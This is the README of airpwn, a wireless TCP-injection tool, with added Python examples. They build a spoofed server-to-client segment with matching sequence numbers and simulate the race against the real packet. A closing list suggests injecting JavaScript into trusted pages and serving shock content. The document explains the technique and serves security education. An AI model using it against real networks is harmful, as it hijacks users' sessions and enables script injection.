Hi! Welcome to airpwn!

Some things you should probably know about airpwn, in some random order:

* This will only work on linux w/ the hostap drivers to my knowledge..
  This is due to the hostap drivers being the only ones I know of that
  will allow you to inject raw 802.11 frames, and then only in "master"
  mode with hostapd set to "1".  You can get hostap from
  http://hostap.epitest.fi

* You can check hostap's site for a list of supported cards, but I
  believe it's limited to prism2 chipsets.  I have successfully run
  airpwn on "SMC EliteConnect" cards (SMC2532W-B), NetGear MA401s and
  a D-Link DWL650.  The "EliteConnects" are highly recommended as they
  push out 200mW (range!) and have 2 connectors for external antennas
  (more range!)

* airpwn requires two cards to operate.. One card in monitor mode (to
  listen to the packets) and one card in master mode (to inject
  packets).  AFAICT, cards in monitor mode cannot send frames, and in
  master mode you don't see traffic destined for other APs.

* Silly limitations to the technology that will hopefully be solved
  soon:

  1. airpwn only supports TCP now
  2. airpwn does not yet support 802.11g cards, as hostap doesn't either
  3. no WEP support yet
  4. for port-based DoS (think wireless firewall) it would be nice to
     respond to a SYN with a RST..
  5. only server-to-client responses are supported now
  6. only one packet can be injected at a time, so your response data
     needs to fit inside the interface MTU

Prerequisites:

  You'll need to have the following installed (and you might need to edit
  the Makefile to specify the proper paths; why? because I am too lazy to
  write a configure script :( )

  * libpcap
  * libnet
  * libpcre
  * hostap drivers

How airpwn works:

  Airpwn monitors traffic on an 802.11b network and responds with
  arbitrary content as configured.  The configuration file specifies a
  match regex, an ignore regex and a file containing the contents to
  inject.  If 'match' is found in a packet and 'ignore' is not, airpwn
  injects a TCP segment that appears to come from the remote IP address
  (and port), carries the sequence and acknowledgement numbers the client
  expects next, and is wrapped in an 802.11 frame bearing the MAC address
  (BSSID) of the AP the client is associated with.  As long as airpwn's
  response arrives before the remote site's, the client accepts it as
  valid and pushes the data to the application.  (Typical internet
  round-trip latency is on the order of 50 msec; airpwn should be able to
  respond in under 1 msec, so it nearly always wins the race.)
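  The sequence-number arithmetic above, as an added example that is not
  airpwn's own code: airpwn is written in C against libnet and hands the
  result to hostap inside an 802.11 data frame, whereas this uses only the
  Python standard library and stops at the IP layer.  The captured client
  request, the addresses (documentation ranges) and the response body are
  all constructed for the example.

```python
# Added example (not airpwn's code): airpwn is written in C against libnet and
# injects its result inside an 802.11 data frame via hostap. This uses only the
# Python standard library and stops at the IP layer; the captured request below
# is constructed for the example, using documentation address ranges.
import socket
import struct

TCP_PSH_ACK = 0x18  # PSH|ACK, what a server uses to hand the client a response


def checksum(data: bytes) -> int:
    """RFC 1071 ones-complement sum of 16-bit words (used for both IP and TCP)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_ipv4_tcp(pkt: bytes) -> dict:
    """Pull out the fields the spoof depends on: addresses, ports, seq, ack, payload."""
    ihl = (pkt[0] & 0x0F) * 4
    total_len = struct.unpack("!H", pkt[2:4])[0]
    tcp = pkt[ihl:total_len]
    sport, dport, seq, ack, off_flags = struct.unpack("!HHIIH", tcp[:14])
    data_off = (off_flags >> 12) * 4
    return {
        "src": socket.inet_ntoa(pkt[12:16]), "dst": socket.inet_ntoa(pkt[16:20]),
        "sport": sport, "dport": dport, "seq": seq, "ack": ack,
        "payload": tcp[data_off:],
    }


def build_ipv4_tcp(src, dst, sport, dport, seq, ack, flags, payload, ttl=64) -> bytes:
    """Minimal IPv4 + TCP (no options) with both checksums filled in."""
    tcp_len = 20 + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + tcp_len, 0, 0x4000, ttl, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    tcp = struct.pack("!HHIIHHHH", sport, dport, seq, ack, (5 << 12) | flags,
                      65535, 0, 0)
    pseudo = socket.inet_aton(src) + socket.inet_aton(dst) + struct.pack("!BBH", 0, 6, tcp_len)
    tcp = tcp[:16] + struct.pack("!H", checksum(pseudo + tcp + payload)) + tcp[18:]
    return ip + tcp + payload


def tcp_checksum_ok(pkt: bytes) -> bool:
    """Re-run the TCP checksum over a received segment; a good one sums to zero."""
    ihl = (pkt[0] & 0x0F) * 4
    tcp = pkt[ihl:struct.unpack("!H", pkt[2:4])[0]]
    pseudo = pkt[12:16] + pkt[16:20] + struct.pack("!BBH", 0, 6, len(tcp))
    return checksum(pseudo + tcp) == 0


def spoof_response(captured: bytes, response: bytes) -> bytes:
    """Build the segment airpwn would inject in reply to a captured client request.

    Addresses and ports are swapped so it appears to come from the server; seq is
    the client's ack (the next byte it expects from the server) and ack covers the
    whole request, so the client's stack accepts it as the next in-order segment.
    """
    req = parse_ipv4_tcp(captured)
    return build_ipv4_tcp(
        src=req["dst"], dst=req["src"], sport=req["dport"], dport=req["sport"],
        seq=req["ack"], ack=req["seq"] + len(req["payload"]),
        flags=TCP_PSH_ACK, payload=response,
    )


# Constructed sample: a client (192.0.2.10) asking a web server (198.51.100.80).
REQUEST = b"GET / HTTP/1.0\r\nHost: example.com\r\n\r\n"
CAPTURED = build_ipv4_tcp("192.0.2.10", "198.51.100.80", 40000, 80,
                          seq=1000, ack=5000, flags=TCP_PSH_ACK, payload=REQUEST)
RESPONSE = b"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n<h1>airpwn</h1>"

if __name__ == "__main__":
    spoofed = spoof_response(CAPTURED, RESPONSE)
    p = parse_ipv4_tcp(spoofed)
    print(p["src"], p["sport"], "->", p["dst"], p["dport"])
    print("seq", p["seq"], "ack", p["ack"], "checksum ok:", tcp_checksum_ok(spoofed))
```

  The two numbers that matter are seq (taken from the client's own ack,
  so the spoof starts exactly where the client expects the server's next
  byte) and ack (the request's seq plus its length, so the client sees
  its whole request acknowledged).  Everything else is cosmetic as far as
  the client's stack is concerned.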

  (TCP details): Since the packet airpwn generates is the next segment
  in the stream and lines up with the expected numbers perfectly, the
  stack will push the data to the application immediately.. The "real"
  packet sent from the intended server will be handled in one of two
  ways, depending on the relative lengths of the packets:

    * If the "real" packet is longer than the injected one, the
      additional data in the real packet will be appended to the end of
      the stream, directly after the injected data.  (If you spoof a
      short response to an HTTP request, the rest of the web page will
      flow after your response (unless the server sends gzipped data, in
      which case you will see garbage.))

    * If the "real" packet is shorter than the injected one, it falls
      entirely inside data the client has already accepted, so the client
      treats it as old data and either a) silently ignores it or b) sends
      an ACK to the server naming the sequence number it now expects to
      see, which is beyond anything the server has actually sent.  NOTE:
      in some cases the server rejects that ACK (it acknowledges data the
      server never sent) and answers with an ACK of its own, which the
      client again sees as old data, so the two sides fall into an
      endless loop of client/server arguments over who has the right
      sequence number.  I have observed over 2000pps being generated by a
      single client/server pair due to this effect.
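  The two cases above, played out in an added example that is not
  airpwn's code: a toy in-order TCP receiver that tracks only rcv_nxt
  (the one piece of client state the outcome turns on), plus the
  server-side check from RFC 793 that keeps the ACK argument going.  The
  segment contents and the starting sequence number are made up.

```python
# Added example (not airpwn's code): a toy in-order TCP receiver that tracks only
# rcv_nxt, the single piece of client state the two cases turn on, plus the
# server-side ACK check that keeps the argument going. Segment sizes are made up.


def receiver_step(rcv_nxt: int, seg_seq: int, seg_data: bytes):
    """One incoming segment at the client. Returns (new_rcv_nxt, delivered, ack)."""
    seg_end = seg_seq + len(seg_data)
    if seg_end <= rcv_nxt:
        # Entirely old data: deliver nothing, repeat the ACK for what we expect next.
        return rcv_nxt, b"", rcv_nxt
    if seg_seq > rcv_nxt:
        # A gap: a real stack buffers this out of order; not needed for the race.
        return rcv_nxt, b"", rcv_nxt
    # Overlaps the front of the window: trim what we already have, deliver the rest.
    delivered = seg_data[rcv_nxt - seg_seq:]
    return seg_end, delivered, seg_end


def server_handles_ack(snd_nxt: int, seg_ack: int) -> str:
    """RFC 793 segment processing on the server: an ACK that acknowledges bytes
    beyond snd_nxt (data it never sent) is dropped and answered with an ACK."""
    return "drop-and-ack" if seg_ack > snd_nxt else "accept"


def race(rcv_nxt: int, injected: bytes, real: bytes):
    """Play the injected segment, then the late real one, both starting at
    seq == rcv_nxt. Returns, per segment, what the client handed to the
    application and the ACK it sent, plus the server's verdict on the last ACK."""
    log = []
    state = rcv_nxt
    for name, data in (("injected", injected), ("real", real)):
        state, delivered, ack = receiver_step(state, rcv_nxt, data)
        log.append((name, delivered, ack))
    # The server's snd_nxt only ever advanced by the real segment it sent.
    verdict = server_handles_ack(rcv_nxt + len(real), log[-1][2])
    return log, verdict


# Constructed segments: a short HTTP response and a longer one (99 vs 31 bytes).
SHORT_SEGMENT = b"HTTP/1.0 200 OK\r\n\r\n<b>pwned</b>"
LONG_SEGMENT = b"HTTP/1.0 200 OK\r\n\r\n" + b"<p>the real page</p>" * 4

if __name__ == "__main__":
    for title, inj, real in (("real longer", SHORT_SEGMENT, LONG_SEGMENT),
                             ("real shorter", LONG_SEGMENT, SHORT_SEGMENT)):
        log, verdict = race(5000, inj, real)
        print(title)
        for name, delivered, ack in log:
            print("  %-8s delivered %3d bytes, client ACKs %d" % (name, len(delivered), ack))
        print("  server verdict on that ACK:", verdict)
```

  In the "real longer" run the tail of the real segment is delivered
  right after the injected bytes and the server is happy with the final
  ACK.  In the "real shorter" run the client delivers nothing, ACKs a
  number past the server's snd_nxt, and the server drops that ACK and
  re-ACKs; the client sees that as old data and ACKs again, which is the
  loop described above.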

  airpwn has been successfully tested against windows, linux and OSX.
  All of them are vulnerable.  In our experience windows is more
  vulnerable than OSX which is again more vulnerable than linux.  IE on
  windows is highly reliable as it will apparently take any data you
  throw at it and put it on the screen as fast as possible.

What can you do with airpwn:

  Well, a lot of things really.  With airpwn, you *are* the network..
  You are every web server out there.  Here are some good (and bad)
  ideas:

  * Be silly and respond to web requests with nasty things like goatse
  * Inject javascript into various webpages and see what fun stuff you
    can do.. Trusted websites have powerful script-fu..
  * Replace all banner-ad requests with ads you feel are more
    appropriate.
  * Write a wireless IDS and respond to dangerous packets with RSTs
  * Overwrite bad MP3s with your own music.. 
  * Automatic chat bot for AIM, IRC, etc.. 
  * Lots of worse/better things..
  * Have fun and teach people about wireless security!  Give people a
    good incentive to, and a solid understanding of why they should use
    VPNs, encrypted proxies, etc..
